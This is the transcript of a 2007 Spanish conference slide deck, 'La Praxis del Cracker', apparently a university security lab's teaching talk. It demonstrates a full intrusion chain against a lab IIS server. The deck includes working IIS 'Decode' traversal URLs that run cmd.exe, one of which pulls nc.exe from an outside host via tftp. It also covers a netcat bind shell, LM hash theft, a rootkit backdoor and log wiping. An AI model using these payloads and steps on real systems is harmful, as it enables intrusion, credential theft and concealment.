Universidad Simón Bolívar LACNIC X - Marzo Margarita

Slides:



Advertisements
Presentaciones similares
Internet y tecnologías web
Advertisements

Técnicas avanzadas de penetración a sistemas
Hoy en día cuando nos hablan de servidores pensamos tanto en grandes bases de datos como en servidores web, con una capacidad tan grande que pueden soportar.
Web Attacks Mauren Alies Maria Isabel Serrano Sergio Garcia
Programa para el Impulso a la Implementación del Protocolo IPv6 en Instituciones Vinculadas a RENATA 2012 Servicio FTP.
Diseñar un sistema que permita al usuario desde un teléfono móvil acceder a su computador personal (o servidor) a través de WAP para administrar algunos.
Aplicación informática. formando parte de una red. pone sus recursos a disposición de las demás computadoras(clientes) de la red. Maneja información.
Servicio de terminal remoto
SERVICIO DE TERMINAL REMOTO. Se trata de un servicio desde un equipo acceder a otra máquina para manejarla remotamente como si estuviéramos sentados delante.
Telnet y SSH Integrantes: Carlos Parra José Isabel
MODELO TCP/IP Conectividad de extremo a extremo especificando como los datos deberian ser formateados,direccionados,transmitidos,enrutados y recibidos.
SEGURIDAD INFORMÁTICA
HERRAMIENTAS INFORMATICAS
Clasificación de SO por usuarios
Guía Consulta De Resultados
Universidad de La Coruña Escuela Universitaria Politécnica Control de Procesos por Computador Diego Cabaleiro 24 de Noviembre 2009.
Tecnologías para el desarrollo de aplicaciones Web
► Troyanos  Tipos de troyanos ► Rootkits  Tipos de rootkits  Detección de rootkits ► Bonet ► Detección de malware ► Troyanos bancarios ► Escáneres.
Escritorio Remoto de Windows 2003 Server 3. C liente Conectar Utilizar programa remoto Sesión y ventanas Rendimiento Recursos compartidos Programa de inicio.
Como Instalar Un Access Point
Diego Pastor Ralde. Client-side Vulnerabilities  Web Browsers  Office Software  Clients  Media Players.
Análisis del lado del servidor y del lado del cliente Ángel Apolinar Corona Irene Granados García.
Tema 13: privacidad en la red Andrea Sánchez Ferriol Arancha Valero García.
PROTOCOLO H T T P.
Introducción a los Sistemas Operativos
Un sistema de gestión de bases de datos: Es un conjunto de programas que permite a los usuarios crear y mantener una base de datos. Por tanto, el SGBD.
BASE DE DATOS EN LA WEB.
File Transfer Protocol (FTP) Jorge Cobeña David González Christian Maray Andrés Valarezo.
Dos años para un golpe El Ordenador del director general Revisando el servidor web secundario, encontró el nombre de usuario y número de IP del director.
Terminal Services Teminal Services es una tecnología que permite a uno o varios usuarios, acceder en forma remota a t r a v é s d e l a r e d, a p l i.
APLICACIÓN EN VISUAL BASIC
UD 1: “Adopción de pautas de seguridad informática” Análisis de las principales vulnerabilidades de un sistema informático. Luis Alfonso Sánchez Brazales.
UNIVERSIDAD JUAREZ DEL ESTADO DE DURANGO COLEGIO DE CIENCIAS Y UMANIDADES COMPUTACION 1 Nombre: Karla Daniela Jara Bruciaga Grupo: G Matricul:
COMPONENTES DEL SISTEMA OPERATIVO.
 Un servidor basado en un procesador Intel que ejecute Windows Server 2003 debe tener al menos 128 MB de RAM. Microsoft recomienda también que haya.
HERRAMIENTAS DE SEGURIDAD
Otras aplicaciones1 FTP Telnet (y ssh) WWW. Otras aplicaciones2 FTP File Tranfer Protocol Protocolo de transferencia de archivos básico pero útil y fácil.
CONCEPTOS FUNDAMENTALES DEL NIVEL DEL SISTEMA OPERATIVO
Diseño de Servicios Web Internet Information Server © Copyright 2003 Víctor ROBLES FORCADA
 La seguridad es la característica de un sistema que está libre de todo peligro. Al se difícil de conseguir hablamos de sistemas fiables en vez de sistemas.
Herramientas de Diseño I N T E R N E T Historia Internet nació de manos de ARPAnet en tiempos de la guerra fría. Esta empresa, estaba afiliada al ejército.
Servidor web Alumna: María Verónica Mancheno Materia: Gestión de Información Web Profesor: José Medina Moreira.
 Claudia Jordan Idrovo.  Son los puntos de enganche para cada conexión de red que realizamos. El protocolo TCP (el utilizado en internet) identifica.
PUNTO 3.
Puertos de un servidor web
WINDOWS 2008 SERVER
File Transfer Protocol.
Sistema operativo Por: Santiago Betancur Henao. Que es? Un sistema operativo (SO) es el programa o conjunto de programas que efectúan la gestión de los.
Unidad 7 Escritorio de Windows.
SISTEMA OPERATIVO WINDOWS.
Tipos de sistemas operativos
Ing. Elizabeth Guerrero V.
Punto 3 – Servicios de Terminal Remoto Juan Luis Cano.
Johnny Alexander Salazar Jhon Fredy Giraldo Giraldo Sebastián Cardona.
BLACKBOARD INTEGRANTES: Fernanda Reséndiz Michelle Ávila Michelle Martínez Kenia Martínez Denisse Salas.
Ing. Elizabeth Guerrero V.
Modalidad E-learning “Curso Hacking Ético y Defensa en Profundidad”
Análisis de las principales vulnerabilidades de un sistema informático. Gabriel Montañés León.
Arquitectura Cliente Servidor
Unidad 4. Servicios de acceso remoto
UD09 Sergio Lucas Madrid. Es un protocolo de Internet para sincronizar los relojes de los sistemas informáticos a través del ruteo de paquetes en redes.
COMPUTER DATA SYSTEMS malwares.
ADMINISTRACIÓN DE REDES Planes de Migración. Migración En tecnología de información y comunicación, la migración es el proceso de la transferencia desde.
 Un backdoor como lo dice su traducción “puerta trasera” es un troyano, que permite acceder de forma remota a un host- víctima ignorando los procedimientos.
Planificación Curso UNIDAD 1. INTRODUCCIÓN A LOS SERVICIOS EN RED UNIDAD 2. SERVICIOS DHCP UNIDAD 3. SERVICIOS DNS UNIDAD 4. SERVICIOS DE ACCESO REMOTO.
WINDOWS SERVER 2008 r2 ADMINISTRACION DE RECURSOS: Con el Administrador de recursos del sistema de Windows del sistema operativo Windows Server® 2008 R2,
En informática, es un protocolo de red para la transferencia de archivos entre sistemas conectados a una red TCP (Transmission Control Protocol)
 Es un software que actúa de interfaz entre los dispositivos de hardware y los programas usados por el usuario para manejar un computador. [1] Es responsable.
Conociendo el modelo Cliente-Servidor
DLM Transact SQL Sesión I Introducción al SQL Server Uso de las herramientas de consultas del Transact SQL.
Transcripción de la presentación:

Universidad Simón Bolívar LACNIC X - Marzo 2007 - Margarita La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita

Laboratorio de Seguridad en Tecnología de la Información USB GISTI Laboratorio de Seguridad en Tecnología de la Información

“La seguridad informática práctica es una sucesión de acciones y reacciones, de ataques y de defensas”. Simson Garfinkel y Eugene Spafford (1999)

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Footprinting (Hallar el Rastro) La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Scanning (Exploración) La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 http://jeremias.nul.usb.ve - La salida ya provee un indicio del “servidor web” que se está ejecutando y del puerto que está atendiendo las peticiones - Empleando otras herramientas como “nmap” de Fyodor, que identifican el sistema operativo usando “TCP Stack Fingerprinting” se puede obtener una información más confiable La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Enumeration (Enumeración) La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Gainning Access (Ganar Acceso) La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 http://jeremias.nul.usb.ve/scripts/..%255c../..%255c../winnt/system32/cmd.exe?c+dir+c:\ - Explotando la vulnerabilidad “Decode” del IIS 4.0 y 5.0, el Cracker puede examinar el contenido de cualquier carpeta del sistema víctima. - Para lograr eso solo requiere ejecutar el comando “dir” de la consola de comandos a través del servidor web La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 http://jeremias.nul.usb.ve/scripts/..%255c../..%255c../winnt/system32/cmd.exe?c+dir+c:\ - ..%255c.. = ..(%25)5c.. = ..%5c .. = ..(%5c).. = .. \ .. http://jeremias.nul.usb.ve/scripts/..\../..\../winnt/system32/cmd.exe?c+dir+c:\ - Estructura lógica del disco de Jeremias: C: \ Inetpub \ scripts \ Winnt \ system32 \ La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 http://jeremias.nul.usb.ve/scripts/..%255c../..%255c../winnt/system32/cmd.exe?c+c:\winnt/system32/tftp.exe+-i+159.90.31.161+get+nc.exe - Explotando la vulnerabilidad “Decode” del IIS 4.0 y 5.0, el Cracker puede ejecutar el cliente ftp para transferir los archivos que desee al sistema víctima. La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 http://jeremias.nul.usb.ve/scripts/..%255c../..%255c../winnt/system32/cmd.exe?c+dir+c:\Inetpub\scripts - Explotando la vulnerabilidad “Decode” del IIS 4.0 y 5.0, el Cracker puede verificar que el archivo que deseaba transferir al sistema víctima llegó correctamente y en cual carpeta reposa. La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Hora de transferir un “exploit” - “Httpodbc.dll” es una biblioteca de enlace dinámica que permitirá al Cracker ejecutar, por medio del navegador, un programa que elevará los privilegios de ejecución y proveerá una interfaz más amigable. Se podrá así, ejecutar cualquier otro programa que se quiera, explotando la misma vulnerabilidad “Decode” del IIS 4.0 y 5.0 - Para el “servidor web” del sistema de la víctima este programa parecerá un “código script” que ha sido colocado para que los usuarios finales lo ejecuten La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Ya es posible ejecutar, en forma más fácil, cualquier comando del sistema de operación a través del “servidor web” IIS 4.0 o 5.0 La Praxis del Cracker – MTS – Margarita 2007

Escalating Privilege (Escalar Privilegios) MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Con esta orden se procede a ejecutar “NETCAT” la “navaja del ejército suizo” de “Hackers” de sombrero blanco y negro, que activa una consola de comandos en el puerto 7001 del sistema víctima Un “nuevo” servicio de comandos queda escuchando desde ese instante La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Desde una consola de comandos local –el atacante- ejecuta ahora un “telnet” al puerto 7001 del sistema de la víctima La idea es disponer de un “login remoto” que permita ejecutar comandos en el sistema víctima Telnet puede operar entre equipos con diferentes Sistemas de Operación y provee un “terminal virtual en la red” La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Con el Telnet se ha establecido una conexión TCP a la consola de comandos que “escucha” peticiones en el puerto 7001 del sistema víctima. Recuérdese que Telnet maneja ambos extremos del canal en forma simétrica Telnet permite además ver la salida de la ejecución de la órdenes remotas en la pantalla local. Es un servicio “transparente” Cualquier orden en el sistema víctima es posible de ser ejecutada, con todos los privilegios y en forma tan amigable que parecería ser un comando local La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

Pilfering (Ratería, Vileza, Bajeza, Ruindad) MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 El Cracker extrae entonces las cuentas y los LM Hashes de las contraseñas. Posteriormente puede usar un programa tipo “Crackeador” La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Esta es una posible salida de lo que se obtendría. De esta forma el Cracker puede ahora suplantar a los usuarios autorizados en el sistema La Praxis del Cracker – MTS – Margarita 2007

Creating Backdoors (Crear las Puertas Traseras) MÉTODO GENÉRICO DE ATAQUE Creating Backdoors (Crear las Puertas Traseras) La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Ahora el Cracker puede “sembrar” calquier programa tipo “backdoor” que le permita volver a entrar en el sistema víctima y ganar privilegios, incluso si la vulnerabilidad “Decode” del IIS 4.0 y 5.0 es subsanada La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Rootkit HD 1.0 – versión de evaluación - Opera en sistemas WNT/W2K/WXP Parecido a un “troyano”, pero con características adicionales para ocultar su existencia y ejecución. Intercepta las llamadas a la API Win32 de Windows y altera la respuesta Genera un nuevo servicio “Hacker Defender 100” sobre cualquier puerto del sistema víctima y se comunica con el atacante a través de un programa cliente “bdclient” Puede adaptar su funcionamiento para disponer de distintas formas de operación Provee facilidad de contraseña para controlar su ejecución La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Covering Tracks (Cubrir las Huellas) La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Finalmente, si se han transferido programas para alterar los “logs”, el Cracker puede borrar fácilmente toda “huella” de su actividad. En caso contrario puede hacerlo manualmente La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Un administrador medianamente experimentado sospechará de inmediato si observa una salida como la anterior y la de abajo La Praxis del Cracker – MTS – Margarita 2007

La Praxis del Cracker – MTS – Margarita 2007 _________________________________ CIERRE “Conoced al enemigo y conoceos vos mismos; en cien batallas nunca correréis ningún peligro”. Sun Tzu El Arte de la Guerra La Praxis del Cracker – MTS – Margarita 2007